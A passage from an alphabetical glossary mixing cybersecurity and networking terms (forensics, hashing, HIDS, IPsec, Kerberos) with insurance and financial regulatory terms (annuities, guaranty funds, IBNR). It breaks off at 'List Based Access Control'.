Foreign Investment
An investment in a foreign jurisdiction, or an investment in a person, real estate or asset domiciled in a foreign jurisdiction. An investment shall not be deemed to be foreign if the issuing person, qualified primary credit source or qualified guarantor is a domestic jurisdiction or a person domiciled in a domestic jurisdiction, unless: a) the issuing person is a shell business entity; and b) the investment is not assumed, accepted, guaranteed or insured or otherwise backed by a domestic jurisdiction or a person, that is not a shell business entity, domiciled in a domestic jurisdiction.
Foreign Jurisdiction
A jurisdiction outside of the United States, Canada or any province or political subdivision of the foregoing.
Forensic Copy
A forensic copy is an accurate bit-for-bit reproduction of the information contained on an electronic device or associated media, whose validity and integrity have been verified using an accepted algorithm.
Forensic Examination
A forensic examination is an investigation to evaluate, analyze, organize, preserve, and document evidence, including digital evidence, that helps identify the cause of an incident.
Forensic Specialist
A forensic specialist is a professional who locates, identifies, collects, analyzes, and examines data while preserving the integrity and maintaining a strict chain of custody of information discovered.
Forensically Clean
Forensically clean describes digital media that is completely wiped of all data, including nonessential and residual data, scanned for malware, and verified before use.
Forensics
Forensics is the practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.
Forward Cipher
A forward cipher is one of the two functions of the block cipher algorithm determined by the choice of a cryptographic key. The term “forward cipher operation” is used for TDEA, while the term “forward transformation” is used for DEA.
Freeware
Freeware is an application, program, or software available for use at no cost.
Fronting
An arrangement in which a primary insurer acts as the insurer of record by issuing a policy, but then passes the entire risk to a reinsurer in exchange for a commission. Often, the fronting insurer is licensed to do business in a state or country where the risk is located, but the reinsurer is not.
FTP
The File Transfer Protocol (FTP) is a legacy network protocol used to transfer files between two endpoints. Because FTP itself provides no encryption, it has been replaced by more secure alternatives such as Secure File Transfer Protocol (SFTP), which encrypts the transfer.
Full Disk Encryption
Full disk encryption is the process of encrypting all the data on the hard disk drive used to boot a computer, including the computer’s operating system, and permitting access to the data only after successful authentication with the full disk encryption product.
Fuzzing
Fuzz testing (fuzzing) is a quality assurance technique used to discover coding errors and security loopholes in software, operating systems, or networks.
G
Gateway
A gateway is an intersection where networks with different transmission protocols meet. Gateways serve as the entry and exit points for all data, converting information from one format to another. For example, a Wi-Fi router is a gateway between your computer and your internet service provider's network.
Generally Accepted Accounting Principle (GAAP)
An aggregate of the accounting standards, principles, and best practices for the preparation of financial statements, allowing for consistency in reporting.
Get Nearest Server
Get Nearest Server is a request packet sent by a client on an IPX network to locate the nearest active server of a particular type. An IPX network client issues a GNS request to solicit either a direct response from a connected server or a response from a router that tells it where on the inter-network the service can be located. GNS is part of the IPX SAP.
Gethostbyaddr
gethostbyaddr is a DNS (Domain Name System) lookup that returns the Internet host name corresponding to an IP address.
Gethostbyname
gethostbyname is a DNS (Domain Name System) lookup that returns the IP address corresponding to an Internet host name.
GNU
The name GNU stands for "GNU's Not Unix" (GNU is pronounced g'noo). Development of GNU started in January 1984 and is known as the GNU Project. GNU is a Unix-like operating system (OS) that comprises many programs, such as applications, libraries, developer tools, and games. GNU is distributed with its source code, which allows a user to run, copy, modify, distribute, study, change, and improve the software.
Gnutella
Gnutella is an open file-sharing or peer-to-peer (P2P) network first developed by Justin Frankel and Tom Pepper of Nullsoft in early 2000. It was the first decentralized file-sharing network: each node acts as a server for sharing files while simultaneously acting as a client that searches for and downloads files from other users.
Goodwill
The difference between the cost of acquiring the entity and the reporting entity's share of the book value of the acquired entity.
Governance
Governance is a system for directing and controlling an organization. It includes a set of rules, processes, and practices established to evaluate the options, needs, and conditions of stakeholders such as management, suppliers, financiers, and customers. It also includes a framework for attaining the organization's established goals while balancing those goals against the interests of the stakeholders. It aims to protect the interests of the organization by protecting its assets, and the interests of its creditors and customers.
Governance, Risk Management and Compliance
Governance, Risk Management and Compliance (GRC) is a comprehensive, integrated, organization-wide system for achieving the goals set in each of its three areas, namely governance, risk management, and compliance, and for meeting regulatory standards and requirements.
Graduated Security
Graduated security is a security system that provides several levels (e.g., low, moderate, high) of protection based on threats, risks, available technology, support services, time, human concerns, and economics.
Gramm-Leach-Bliley Act (GLBA)
An act, repealing the Glass-Steagall Act of 1933, that allows consolidation of commercial banks, investment institutions and insurance companies. It established a framework of responsibilities of federal and state regulators for these financial industries. It permits financial services companies to merge and engage in a variety of new business activities, including insurance, while attempting to address the regulatory issues raised by such combinations.
Gross Paid-In and Contributed Surplus
Amount of capital received over the par value of the stock issued.
Gross Premium
The net premium for insurance plus commissions, operating and miscellaneous commissions. For life insurance, this is the premium including dividends.
Group Annuities- Deferred Non-Variable and Variable
An annuity contract that provides an accumulation based on both (1) funds that accumulate based on guaranteed crediting interest rates or an additional interest rate applied to designated considerations, and (2) funds where the accumulation varies in accordance with the rate of return of the underlying investment portfolio selected by the policyholder. The contract provides for the initiation of payments at some designated future date.
Group Annuities- Immediate Non-Variable and Variable
An annuity contract that provides an accumulation based on both (1) funds that accumulate based on guaranteed crediting interest rates or an additional interest rate applied to designated considerations, and (2) funds where the accumulation varies in accordance with the rate of return of the underlying investment portfolio selected by the policyholder. The contract provides for the initiation of payments at some interval that may vary; however, the annuity payouts must begin within 13 months.
Group Annuities- Unallocated
Annuity contracts or portions thereof where the insurer purchases an annuity for the retirees.
Group Annuity
A contract providing income for a specified period, or for the duration of life, for a person or persons, established to benefit a group of employees.
Group Authenticator
A group authenticator is sometimes used in addition to a sign-on authenticator to allow access to specific data or functions that may be shared by all members of a particular group.
Group Code
A unique three-to-five-digit number assigned by the NAIC to identify those companies that are part of a larger group of insurance companies.
Group Credit-Life
Contracts sold in connection with loan/credit transactions or other credit transactions, which do not exceed a stated duration and/or amount and provide insurance protection against death.
Group Health
Health insurance issued to employers, associations, trusts, or other groups covering employees or members and/or their dependents, to whom a certificate of coverage may be provided.
Guaranty Fund
Funding mechanism employed by states to provide funds to cover policyholder obligations of insolvent reporting entities.
Guard System
A guard system is a mechanism limiting the exchange of information between information systems or subsystems.
Guessing Entropy
Guessing entropy is a measure of the difficulty an attacker faces in guessing the average password used in a system. Entropy is stated in bits. When a password has n bits of guessing entropy, an attacker has as much difficulty guessing the average password as guessing an n-bit random quantity. The attacker is assumed to know the actual password frequency distribution.
Guideline
A guideline is a general rule, or a piece of advice, that should be followed to accomplish the set goals of an organization.
H
Hacker
Hacker is a term used for an expert computer programmer who intentionally tries to gain unauthorized access to a network or computer system.
White Hat Hacker
A cybersecurity expert who tests a system by running mock cyberattacks to discover potential security vulnerabilities.
Black Hat Hacker
A person who tries to break into a computer system by exploiting cybersecurity vulnerabilities.
Hacktivism
Hacktivism is the term used to describe hacking activity carried out for political or social purposes, typically targeting corporations, governments, organizations, and individuals.
HAG
A High Assurance Guard (HAG) is an enclave boundary protection device that controls access, with a high degree of assurance, between a local area network that an enterprise system is required to protect and an external network outside the control of the enterprise system. A HAG has two basic functional capabilities: a Message Guard and a Directory Guard. The Message Guard provides filter service for message traffic traversing the guard between adjacent security domains. The Directory Guard provides filter service for directory access and updates traversing the guard between adjacent security domains.
Handshaking Procedures
Handshaking procedures are the dialogue between two information systems for synchronizing, identifying, and authenticating themselves to one another.
Hard Copy Key
A hard copy key is physical keying material, such as printed key lists, punched, or printed key tapes, or programmable, read-only memories.
Hard Market
A market characterized by high demand and low supply.
Hardening
The process of securing a system.
Hardware
Hardware is the physical component of an information system. See also Software and Firmware.
Hardwired Key
A hardwired key is a permanently installed key.
Hash-Based Message Authentication Code
Hash-based Message Authentication Code is a message authentication code that uses a cryptographic key and a hash function.
Hash Function
A Hash Function is used to map data of arbitrary size to data of a known or fixed size. The values returned by a hash function are called hash values, hash codes, hash sums, or simply hashes.
Hash Functions
A cryptographic hash function is a kind of hash function for which it is computationally infeasible to recreate the input data from its hash value alone. The input data is referred to as the "message," and the hash value is called the "message digest" or the "digest." The result of this hash function can be used to check whether a larger file has been changed, without comparing the larger files themselves. Examples of frequently used hash functions are MD5 and SHA-1, although both are now considered cryptographically broken and unsuitable for security purposes.
Hash Total
A hash total is a method of verifying the accuracy of data: the values in different fields are added up, including fields whose sum has no meaning in itself, such as account numbers. The resulting sum should be the same as the original; a mismatch in the totals indicates an error.
Hash Value
A hash value is the result of applying a cryptographic hash function to data (e.g., a message).
Hashing
Hashing is generating a value or values from a string of text using a mathematical function.
Hazard
Circumstance which tends to increase the probability or severity of a loss.
Header
A Header refers to the additional data at the beginning of a chunk of data (or packet) being stored or transmitted. The data that follows the header is called the payload or body. Note that it is important that the header is of clear and unambiguous format to allow for parsing.
HIDS
A host-based intrusion detection system (HIDS) is an intrusion detection system that monitors and analyzes information from the operating system audit records produced on the host. These operations are then compared to a pre-defined security policy. This analysis of the audit trail imposes significant overhead on the system because of the processing power the intrusion detection system must consume. Depending on the size of the audit trail and the system's processing ability, the review of audit data could result in the loss of real-time analysis capability.
High Assurance Guard
A High Assurance Guard (HAG) is an enclave boundary protection device that controls access, with a high degree of assurance, between a local area network that an enterprise system is required to protect and an external network outside the control of the enterprise system. A HAG has two basic functional capabilities: a Message Guard and a Directory Guard. The Message Guard provides filter service for message traffic traversing the guard between adjacent security domains. The Directory Guard provides filter service for directory access and updates traversing the guard between adjacent security domains.
High Availability
High availability is a failover feature to ensure availability during device or component interruptions.
High Impact
High impact is the loss of confidentiality, integrity, or availability that could be expected to have a severe or catastrophic adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; i.e., it (1) causes a severe degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; (2) results in major damage to organizational assets; (3) results in major financial loss; or (4) results in severe or catastrophic harm to individuals involving loss of life or serious life-threatening injuries.
High Impact System
A high impact system is an information system in which at least one security objective (i.e., confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of high.
Hijack Attack
A hijack attack is a form of active wiretapping in which the attacker seizes control of a previously established communication association.
Hijacking
Hijacking is a network security attack by which the intruder takes control of a connection, while a session is in progress. The intruder gains unauthorized access to the information.
HMAC
Hash-based Message Authentication Code is a message authentication code that uses a cryptographic key and a hash function.
Hoax
Hoaxes are reports of false and unfounded claims to trick or defraud users.
Hold-Harmless Agreement
A risk transfer mechanism whereby one party assumes the liability of another party by contract.
HoneyClient
HoneyClient is a web browser-based high interaction client honeypot designed by Kathy Wang in 2004 and subsequently developed at MITRE. It was the first open-source client honeypot and is a mix of Perl, C++, and Ruby. HoneyClient is state-based and detects attacks on Windows clients by monitoring files, process events, and registry entries.
Honeymonkey
A honeymonkey is an automated program that imitates a human user to detect and identify websites which exploit vulnerabilities on the Internet. It is also known as Honey Client.
Honeypot
A honeypot is a computer security mechanism set to detect, deflect, or counteract attempts at unauthorized use of information systems.
Hops
A hop occurs each time that a data packet is passed from one device (source) to the next device (destination). Data packets pass through bridges, routers, and gateways on the way.
Host
A network host is a computer or other device connected to a computer network. A network host is a network node that is assigned a network layer host address. A network host may offer information resources, services, and applications to users or other nodes on the network.
Host-Based Intrusion Detection System
A host-based intrusion detection system (HIDS) is an intrusion detection system that monitors and analyzes information from the operating system audit records produced on the host. These operations are then compared to a pre-defined security policy. This analysis of the audit trail imposes significant overhead on the system because of the processing power the intrusion detection system must consume. Depending on the size of the audit trail and the system's processing ability, the review of audit data could result in the loss of real-time analysis capability.
Hot Site
A hot site is a fully operational offsite data processing facility equipped with hardware and software, to be used in the event of an information system disruption. It is a backup site that includes phone systems with the phone lines already connected. Networks will also be in place, with any necessary routers and switches plugged in and turned on. Desks will have desktop PCs installed and waiting, and server areas will be replete with the necessary hardware to support business-critical functions. Within a few hours, a hot site can become a fully functioning element of an organization.
Hot Wash
A hot wash is a debrief conducted immediately after an exercise or test with the staff and participants.
HTML
Hypertext Markup Language (HTML) is a set of markup symbols or codes inserted in a file intended for display on a World Wide Web (WWW) browser page. These markups tell the browser how to display a web page to the user.
HTTP
HTTP is the underlying protocol used by the World Wide Web (WWW). This protocol defines how messages are formatted and transmitted on the Internet and what actions web servers and browsers should take in response to various commands.
HTTP Proxy
An HTTP proxy is a server that receives requests from your web browser and then forwards them to the Internet on your behalf. It then returns the results to your browser.
HTTPS
HTTPS (also called HTTP over TLS, HTTP over SSL, and HTTP Secure) is an Internet protocol used for secure communication over a computer network. HTTPS is especially important over insecure networks (such as public Wi-Fi), as anyone on the same local network can discover sensitive information not protected by HTTPS. HTTPS consists of communication over Hypertext Transfer Protocol (HTTP) within a connection encrypted by Transport Layer Security or its predecessor, Secure Sockets Layer.
HTTPS Scanning
Malware and other threats can hide in encrypted traffic from trusted websites. HTTPS scanning decrypts, scans and then re-encrypts this data.
Hub
A hub is a network device that is a common connection point for devices in a network. These are commonly used to connect segments of a LAN. A hub contains multiple ports. When a data packet is received at one port, it is transmitted to the other ports on the hub.
Hybrid Attack
A hybrid attack is a blend of the dictionary attack method and the brute-force attack method. This means that while a dictionary attack would use a word list of passwords, the brute-force attack would be applied to each password in that list.
Hybrid Encryption
Hybrid encryption is a method of encryption that combines two or more encryption algorithms or systems. This method merges asymmetric and symmetric encryption to derive benefit from the strengths of each form of encryption. These strengths include speed and security, respectively.
Hybrid Security Control
Hybrid security control is a security control that is implemented in an information system in part as a common control and in part as a system-specific control.
Hyperlink
A hyperlink (usually highlighted by color or underscoring) could be a word, a phrase, or an image that refers to data or related information that the user can directly follow either by clicking or by hovering. A hyperlink points to a whole document or to a specific element within a document while a hypertext is text with hyperlinks.
Hypertext Markup Language
Hypertext Markup Language (HTML) is a set of markup symbols or codes inserted in a file intended for display on a World Wide Web (WWW) browser page. These markups tell the browser how to display a web page to the user.
Hypertext Transfer Protocol
HTTP is the underlying protocol used by the World Wide Web (WWW). This protocol defines how messages are formatted and transmitted on the Internet and what actions web servers and browsers should take in response to various commands.
I
Identity
Internet identity (IID) or internet persona is a social identity that an Internet user creates on online communities and websites. While some users prefer using their real names online, others prefer to be anonymous and identify themselves by means of pseudonyms.
Identity theft
Identity theft occurs when someone gains unauthorized access to personal, identifying information and uses it maliciously. Someone committing identity theft may use the victim’s information to open new accounts, steal money, and damage their credit.
Incident
An incident is an unplanned disruption or degradation of a network or system service and needs to be resolved immediately. An example of an incident is a server crash that causes a disruption in the business process. However, if the disruption is planned, say, a scheduled maintenance, it is not an incident.
Incident Handling
Incident handling is an action plan developed (by an organization or individual) to counteract intrusions, cyber-theft, denial of service, fire, flood, and any other security-related events. It comprises six process steps: preparation, identification of the attack, containment of the attack, eradication, recovery, and analysis (lessons-learned documentation).
Incident Response Plan
An organized approach to address and manage the aftermath of a cyber-attack or an incident. The goal is to limit damage and reduce recovery time and costs.
Incontestability Provision
A life insurance and annuity provision limiting the time within which the insurer has the legal right to void the contract on grounds of material misrepresentation in the policy application.
Incremental Backups
An incremental backup provides a backup of only those files that have changed, modified, or are new since the last backup. Incremental backups are often desirable as they consume minimum storage and are quicker to perform than differential backups.
Incurred but Not Reported
(Pure IBNR) claims that have occurred, but the insurer has not been notified of them at the reporting date. Estimates are established to book these claims. May include losses that have been reported to the reporting entity but have not yet been entered into the claims system or bulk provisions. Bulk provisions are reserves included with other IBNR reserves to reflect deficiencies in known case reserves. IBNR can sometimes include estimates of incurred but Not Enough Reported (IBNER)
Incurred Claims
Paid claims plus amounts held in reserve for those that have been incurred but not yet paid.
ICMP
The Internet Control Message Protocol (ICMP) is one of the key Internet protocols and is used by network devices such as routers to generate error messages to the source IP address when network problems prevent delivery of IP packets. Any IP network device can send, receive or process ICMP messages. This protocol is also used to relay query messages and is assigned protocol number 1.
ICS
Industrial Control System (ICS) is a collective term used to describe different types of control systems and associated instrumentation, which includes the devices, systems, networks, and controls used to operate and/or automate industrial processes.
IETF
The Internet Engineering Task Force (IETF) is a large open international community of network designers, operators, vendors, and researchers who are concerned with the evolution of the Internet architecture and its smooth operations. This body defines the standard Internet operating protocols such as TCP/IP. The IETF is supervised by the Internet Society Internet Architecture Board (IAB). The Internet Assigned Numbers Authority (IANA) is the central coordinator for the assignment of unique parameter values for Internet protocols.
IMAP
The Internet Message Access Protocol (IMAP) is a standard Internet protocol used by e-mail clients to retrieve e-mail messages from a mail server over TCP/IP. IMAP is defined by RFC 3501. An IMAP server typically listens on port number 143. IMAP over SSL (IMAPS) is assigned port number 993.
Incurred Losses
Sustained losses, paid or not, during a specified time period. Incurred losses are typically found by combining losses paid during the period with unpaid losses sustained during the time period, minus outstanding losses at the beginning of the period that were incurred in the previous period.
Indemnity, Principle of
A general legal principle related to insurance that holds that the individual recovering under an insurance policy should be restored to the approximate financial position he or she was in prior to the loss. The legal principle limits compensation for damages to the equivalent of the losses incurred.
Independent Adjuster
Freelance contractor paid a fee for adjusting losses on behalf of companies.
Independent Agent
A representative of multiple insurance companies who sells and services policies for records which they own and operate under the American Agency System.
Independent Contractor
An individual who is not employed by a company but instead works for themselves, providing goods or services to clients for a fee.
Index Annuity
An interest-bearing fixed annuity tied to an equity index, such as the Dow Jones Industrial Average or S&P 500.
Individual Annuities- Deferred Non-Variable and Variable
An annuity contract that provides an accumulation based on both (1) funds that accumulate based on a guaranteed crediting interest rate or additional interest rate applied to designated considerations, and (2) funds where the accumulation varies in accordance with the rate of return of the underlying investment portfolio selected by the policyholder. The contract provides for the initiation of payments at some designated future date.
Individual Annuities- Immediate Non-Variable and Variable
An annuity contract that provides an accumulation based on both (1) funds that accumulate based on a guaranteed crediting interest rate or additional interest rate applied to designated considerations, and (2) funds where the accumulation varies in accordance with the rate of return of the underlying investment portfolio selected by the policyholder. The contract provides for the initiation of payments at some interval that may vary; however, the annuity payouts must begin within 13 months.
Individual Credit- Credit Disability
Makes monthly loan/credit transaction payments to the creditor upon the disablement of an insured debtor.
Individual Credit- Life
Contracts sold in connection with loan/credit transactions or other credit transactions, which do not exceed a stated duration and/or amount and provide insurance protection against death.
Individual Health
Health insurance where the policy is issued to an individual covering the individual and/or their dependents in the individual market. This includes conversions from group policies.
Industrial Control System
Industrial Control System (ICS) is a collective term used to describe different types of control systems and associated instrumentation, which includes the devices, systems, networks, and controls used to operate and/or automate industrial processes.
Industrial Life
Industrial life insurance, also called "debit" insurance, is insurance under which premiums are paid monthly or more often, the face amount of the policy does not exceed a stated amount, and the words "industrial policy" are printed in prominent type on the face of the policy.
Inetd
Inetd stands for Internet Service Daemon and is a super-server daemon on many Unix systems that manages several Internet services. This reduces the load on the system, because network services such as telnet, File Transfer Protocol (FTP), and Simple Mail Transfer Protocol (SMTP) can be activated on demand rather than running continuously.
Inference Attack
An inference attack is a data mining technique used to illegally access information about a subject or database by analyzing data. This is an example of breached information security. Such an attack occurs when a user can deduce key or critical information about a database from trivial information without directly accessing it.
Information security (InfoSec)
InfoSec stands for information security. It refers to a subcategory of cybersecurity that focuses on the practices, systems, and processes used to protect sensitive information.
Information Warfare
Information Warfare (IW) is primarily a United States Military concept that involves the use and management of information and communication technology in pursuit of a competitive advantage over an opponent. This concept may employ a combination of tactical information, assurance(s) that the information is valid, spreading of propaganda or disinformation to demoralize or manipulate the enemy and the public, undermining the quality of opposing force information and denial of information-collection opportunities to opposing forces.
Ingress Filtering
Ingress filtering is used to ensure that all incoming packets (of data) are from the networks from which they claim to originate. Network ingress filtering is a packet filtering technique commonly used by Internet service providers to prevent source address spoofing. This helps combat network abuse and crime by making Internet traffic traceable to its source.
Input Validation Attacks
Input validation attacks occur when an attacker purposefully sends unexpected or malformed inputs to confuse a web application. Input validation routines serve as the first line of defense against such attacks. Examples of input validation attacks include buffer overflow, directory traversal, cross-site scripting, and SQL injection.
Insider Threat
An insider threat is a malicious threat to an organization that comes from people within the organization.
Insurable Interest
A right or relationship regarding the subject matter of the insured contract such that the insured can suffer a financial loss from damage, loss, or destruction. (Bickelhaupt and Magee)
Insurance
An economic device transferring risk from an individual to a company and reducing the uncertainty of risk via pooling.
Insurance Holding Company System
Consists of two or more affiliated persons, one or more of which is an insurer.
Insurance Regulatory Information System (IRIS)
A baseline solvency screening system for the National Association of Insurance Commissioners (NAIC) and state insurance regulators established in the mid-1970s.
Insurance to Value
Amount of insurance purchased vs. the actual replacement cost of the insured property, expressed as a ratio.
Insured
The party or parties covered by an insurance policy.
Insurer
An insurer or reinsurer authorized to write property and/or casualty insurance under the laws of any state.
Integrity
The integrity of a system or network is the assurance that information can only be accessed or modified by those who are authorized. Several measures are taken to ensure integrity. These include controlling the physical environment of networked terminals and servers, restricting access to data, and maintaining rigorous authentication practices. Data integrity can be threatened by environmental hazards, such as heat, dust, and electrical surges.
Integrity Star Property
Integrity Star Property means a user cannot access or read data of a lower integrity level than their own.
Intermediary
A person, corporation, or other business entity (not licensed as a medical provider) that arranges, by contracts with physicians and other licensed medical providers, to deliver health services for a health insurer and its enrollees via a separate contract between the intermediary and the insurer.
International
Includes all business transacted outside the U.S. and its territories and possessions where the appropriate line of business is not determinable.
Internet
The Internet is the worldwide network of interconnected computers that use the Internet protocol suite (TCP/IP) to link billions of devices across the globe. It carries an extensive range of information resources and services, such as the inter-linked hypertext documents and applications of the World Wide Web (WWW), electronic mail, telephony, and peer-to-peer networks for file sharing.
Internet Control Message Protocol
The Internet Control Message Protocol (ICMP) is one of the key Internet protocols and is used by network devices such as routers to generate error messages to the source IP address when network problems prevent delivery of IP packets. Any IP network device can send, receive or process ICMP messages. This protocol is also used to relay query messages and is assigned protocol number 1.
Internet Engineering Task Force
The Internet Engineering Task Force (IETF) is a large open international community of network designers, operators, vendors, and researchers who are concerned with the evolution of the Internet architecture and its smooth operations. This body defines the standard Internet operating protocols such as TCP/IP. The IETF is supervised by the Internet Society Internet Architecture Board (IAB). The Internet Assigned Numbers Authority (IANA) is the central coordinator for the assignment of unique parameter values for Internet protocols.
Internet Liability
Coverage for cyber commerce includes copyright infringement, libel, and violation of privacy.
Internet Message Access Protocol
The Internet Message Access Protocol (IMAP) is a standard Internet protocol used by e-mail clients to retrieve e-mail messages from a mail server over TCP/IP. IMAP is defined by RFC 3501. An IMAP server typically listens on port number 143. IMAP over SSL (IMAPS) is assigned port number 993.
Internet of Things
Internet of Things (IoT) is essentially everyday objects in your business or house that are connected to the Internet.
Internet Protocol
The Internet Protocol (IP) is a communication protocol used for relaying datagrams across network boundaries. It has a routing function which enables inter-networking and establishes the Internet.
Internet Standard
An Internet Standard (STD) is a normative specification (approved by the IESG and published as an RFC) of a technology or methodology applicable to the Internet. Internet Standards are created and published by the Internet Engineering Task Force (IETF). An Internet Standard is characterized by technical reliability and usefulness. The IETF also defines a proposed standard as a less mature but stable and well-reviewed specification.
Internet Worm
Worms are a form of malware that replicates across the Internet or local networks.
Interrupt
An Interrupt is a signal sent to the processor by hardware or software indicating an event that needs immediate attention.
Intranet
An intranet is a private network accessible only to an organization's staff.
Intrusion
Unauthorized act of bypassing the security mechanisms of a network or information system.
Intrusion Detection
Intrusion Detection is a security management system for computers and networks. An ID system gathers and analyses information about a computer or a network to identify possible security breaches which include both intrusions and misuse. This system uses vulnerability assessment, a technology developed to assess the security of a computer system or network.
Intrusion Prevention System
Intrusion Prevention System (IPS) is a network security system designed to prevent malicious activity.
Investment Grade
The obligation has been determined to be in one of the top four generic lettered rating classifications by a securities rating agency acceptable to the commissioner, that the obligation has been identified in writing by such a rating agency to be of investment grade quality, or, if the obligation has not been submitted to any such rating agency, that the obligation has been determined to be investment grade (Class 1 and Class 2) by the Securities Valuation Office of the National Association of Insurance Commissioners.
Investment Income Accrued
Investment income earned as of the reporting date but not legally due to be paid to the reporting entity until after that date.
Investment Income Due
Investment income earned and legally due to be paid to the reporting entity as of the reporting date.
Investment Income Gross
Shall be recorded as earned and shall include investment income collected during the period, the change in investment income due and accrued, the change in unearned investment income, plus any amortization (e.g., discounts or premiums on bonds, origination fees on mortgage loans, etc.).
IoT
Internet of Things (IoT) is essentially everyday objects in your business or house that are connected to the Internet.
IP
The Internet Protocol (IP) is a communication protocol used for relaying datagrams across network boundaries. It has a routing function which enables inter-networking and essentially establishes the Internet.
IP Address
An Internet Protocol address (IP address) is a logical numeric address assigned to a device that is part of a TCP/IP-based network.
Internet Protocol Address
An Internet Protocol address (IP address) is a logical numeric address assigned to a device that is part of a TCP/IP-based network.
IPS
Intrusion Prevention System (IPS) is a network security system designed to prevent malicious activity.
IPsec
Internet Protocol Security (IPsec) is a framework of open standards for ensuring private, secure communications over Internet Protocol (IP) networks, through cryptographic security services.
IP Flood
An IP flood is a type of denial-of-service attack in which the victim system is flooded with traffic that uses up all the available bandwidth and prevents legitimate users from gaining access. When IP Flood Detection is enabled, the router can block malicious devices attempting to flood the network.
IP Forwarding
IP forwarding, also known as Internet routing, is the process of determining the path along which a packet or datagram will be sent.
IP Spoofing
IP spoofing is also known as IP address forgery or a host file hijack. It is a hijacking technique in which an attacker impersonates a trusted host to conceal their identity, spoof a website, hijack browsers, or gain access to a network.
IPS
Intrusion prevention systems (IPS) monitor networks and systems for malicious activity.
IPsec
IPsec authenticates and encrypts each Internet Protocol (IP) packet of a communication session.
Irrevocable Beneficiary
A life insurance policy beneficiary who has a vested interest in the policy proceeds even during the insured's lifetime, because the policy owner has the right to change the beneficiary designation only after obtaining the beneficiary's consent.
ISO
The International Organization for Standardization (ISO) is an international standard-setting body composed of voluntary representatives from various national standards organizations.
Issue-Specific Policy
An Issue-Specific Policy is intended to address specific needs within an organization, such as a password policy.
ITU-T
The ITU Telecommunication Standardization Sector (ITU-T) is one of the three sectors of the International Telecommunication Union (ITU). It coordinates standards for telecommunications. The International Telegraph and Telephone Consultative Committee (CCITT, from French: Comité Consultatif International Téléphonique et Télégraphique) was created in 1956 and was renamed ITU-T in 1993. ITU became a United Nations specialized agency in 1947.
J
Jitter
Jitter is any deviation in, or displacement of, the signal pulses in a high-frequency digital signal. The aberration can be in amplitude, phase timing, or the width of the signal pulse. Jitter is sometimes referred to as "Packet Delay Variation," or PDV. Controlling jitter is critical for a good online experience.
Joint and Last Survivor Annuity
Retirement plan that continues to pay out so long as at least one of two or more annuitants is alive.
Joint-Life Annuity
An annuity contract that ceases upon the death of the first of two or more annuitants.
Joint Underwriting Association (JUA)
A loss-sharing mechanism combining several insurance companies to provide extra capacity due to the type or size of exposure.
Jump Bag
A jump bag is a container holding all the items necessary to respond to an incident, so that the effects of a delayed reaction are mitigated.
K
Kerberos
Kerberos is a ticket-based computer network authentication protocol that allows nodes to communicate over a non-secure network. The Massachusetts Institute of Technology (MIT) developed Kerberos to protect network services provided by Project Athena. This protocol is based on the earlier Needham–Schroeder symmetric key protocol. Kerberos protocol messages are protected against snooping and replay attacks.
Kernel
The kernel is an essential center of a computer operating system, the core that provides basic services for all other parts of the operating system. A synonym is nucleus. A kernel can be contrasted with a shell, the outermost part of an operating system that interacts with user commands. Kernel and Shell are terms used more frequently in Unix operating systems than in IBM mainframe or Microsoft Windows systems.
Key Pair
Every digital certificate has a pair of associated cryptographic keys. This pair of keys consists of a private key and a public key.
Key-Persons Insurance
A policy purchased by, and for the benefit of, a business, insuring the life or lives of personnel integral to the business operations.
Keylogging
A process of secretly recording keystrokes by an unauthorized third party.
Kidnap/Ransom Insurance
Coverage for ransom or extortion costs and related expenses.
L
L2F
Layer 2 Forwarding Protocol (L2F) is an Internet protocol, originally developed by Cisco Corporation, that uses tunnelling of PPP over IP to create a virtual extension of a dial-up link across a network, initiated by the dial-up server and transparent to the dial-up user.
L2TP
An extension of the Point-to-Point Tunneling Protocol used by an Internet service provider to enable the operation of a virtual private network over the Internet.
Lapse
Termination of a policy due to failure to pay the required renewal premium.
Lattice Techniques
Lattice Techniques use security designations to determine access to information.
Layer 2 Forwarding Protocol
Layer 2 Forwarding Protocol (L2F) is an Internet protocol, originally developed by Cisco Corporation, that uses tunnelling of PPP over IP to create a virtual extension of a dial-up link across a network, initiated by the dial-up server and transparent to the dial-up user.
Layer 2 Tunneling Protocol
An extension of the Point-to-Point Tunneling Protocol used by an Internet service provider to enable the operation of a virtual private network over the Internet.
LDAP
Lightweight Directory Access Protocol (LDAP) is an open, vendor-neutral, industry standard application protocol used for accessing and maintaining distributed directory information services over an IP network.
Least Privilege
Least privilege is the principle of granting users or applications only the minimum set of permissions necessary to perform their intended function.
Legion
Legion is a software tool used to detect unprotected shares.
Level Premium Insurance
Life insurance policy for which the cost is equally distributed over the term of the premium period, remaining constant throughout.
Liability
A certain or probable future sacrifice of economic benefits arising from present obligations of a particular entity to transfer assets or to provide services to other entities in the future as a result of past transaction(s) or event(s). It has three essential characteristics: a) It embodies a present duty or responsibility to one or more other entities that entails settlement by probable future transfer or use of assets at a specified or determinable date, on occurrence of a specified event, or on demand; b) The duty or responsibility obligates a particular entity, leaving it little or no discretion to avoid the future sacrifice; and c) The transaction or other event obligating the entity has already happened.
Life- Endowment
Insurance that pays the same benefit amount should the insured die during the term of the contract, or if the insured survives to the end of the specified coverage term or age.
Life- Flexible Premium Adjustable Life
A group life insurance that provides a face amount that is adjustable to the certificate holder and allows the certificate holder to vary the modal premium that is paid or to skip a payment so long as the certificate value is sufficient to keep the certificate in force, and under which separately identified interest credits (other than in connection with dividend accumulation, premium deposit funds or other supplementary accounts) and mortality and expense charges are made to individual certificates while providing minimum guaranteed values.
Life Settlements
A contract or agreement in which a policyholder agrees to sell or transfer ownership in all or part of a life insurance policy to a third party for compensation that is less than the expected death benefit of a policy.
Lifetime Disability Benefit
A provision in some disability income policies to recoup lost wages for the term of disability or the remainder of the insured's life in case of permanent disability.
Lightweight Directory Access Protocol
Lightweight Directory Access Protocol (LDAP) is an open, vendor-neutral, industry standard application protocol used for accessing and maintaining distributed directory information services over an IP network.
Limits
Maximum value to be derived from a policy.
Line of Business
Classification of business written by insurers.
Link State
Link-state routing protocols are one of the two main classes of routing protocols used in packet switching networks. The link-state protocol is performed by every switching node in the network. Every node creates a map of the connectivity to the network (in the form of a graph) displaying all the nodes that are connected to other nodes. Each node then calculates the next best logical path from it to every possible destination in the network. The collection of these best paths forms the node’s routing table.
List Based Access Control
